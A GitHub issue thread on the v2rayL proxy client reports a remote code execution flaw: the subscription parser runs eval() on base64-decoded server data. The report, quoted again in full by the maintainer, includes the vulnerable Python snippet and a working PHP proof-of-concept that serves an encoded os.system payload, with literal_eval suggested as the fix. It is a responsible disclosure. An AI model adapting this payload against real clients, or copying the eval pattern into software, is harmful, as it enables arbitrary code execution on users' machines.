search

jiangxufeng / v2rayL

v2ray linux GUI客户端,支持订阅、vemss、ss等协议,自动更新订阅、检查版本更新
GNU General Public License v3.0
3.16k stars 613 forks source link

RCE Vulnerability in sub2conf_api.py(line 45) #44

Closed TomAPU closed 4 years ago

TomAPU commented 4 years ago

The vulnerability is in function b642conf at sub2conf_api.py(line 45) In this function,to convert a string to a dict,the author used function eval to do so.

    def b642conf(self, prot, tp, b64str):
        if prot == "vmess":
            ret = eval(parse.unquote(base64.b64decode(b64str).decode()))
            region = ret['ps']

However this function is UNSAFE,any one who controls the b64str string can execute any python code he/she wants in your machine When user clicks the button 更新订阅 (update subscribing),the client will send an HTTP request to subscribing server for subscribing data. A malicious subscribing server can send a crafted HTTP response to client to execute arbitary python code on client's machine! Any one who controls the data,from the server owner,MITM attacker,hackers who control the server can execute any code in client's machine

POC CODE

<?php
//move the file into /var/www/html/index.php and launch your apache service. set the subscribing server as http://127.0.0.1/ and click the button
$shellcode="__import__('os').system('gedit')";
$payload="vmess://";
$payload.=base64_encode($shellcode);
$payload.="\n";
$payload=base64_encode($payload);
echo $payload;
?>

POC EXPLOITED RESULT: 2019-11-01-141017_1031x543_scrot FIX SUGGESTION: use literal_eval instead of eval. literal_eval can do the same thing(convert string to dict) safely

jiangxufeng commented 4 years ago

The vulnerability is in function b642conf at sub2conf_api.py(line 45) In this function,to convert a string to a dict,the author used function eval to do so.

    def b642conf(self, prot, tp, b64str):
        if prot == "vmess":
            ret = eval(parse.unquote(base64.b64decode(b64str).decode()))
            region = ret['ps']

However this function is UNSAFE,any one who controls the b64str string can execute any python code he/she wants in your machine When user clicks the button 更新订阅 (update subscribing),the client will send an HTTP request to subscribing server for subscribing data. A malicious subscribing server can send a crafted HTTP response to client to execute arbitary python code on client's machine! Any one who controls the data,from the server owner,MITM attacker,hackers who control the server can execute any code in client's machine

POC CODE

<?php
//move the file into /var/www/html/index.php and launch your apache service. set the subscribing server as http://127.0.0.1/ and click the button
$shellcode="__import__('os').system('gedit')";
$payload="vmess://";
$payload.=base64_encode($shellcode);
$payload.="\n";
$payload=base64_encode($payload);
echo $payload;
?>

POC EXPLOITED RESULT: 2019-11-01-141017_1031x543_scrot FIX SUGGESTION: use literal_eval instead of eval. literal_eval can do the same thing(convert string to dict) safely

Thank you for your issue, the next update will solve this problem, thank you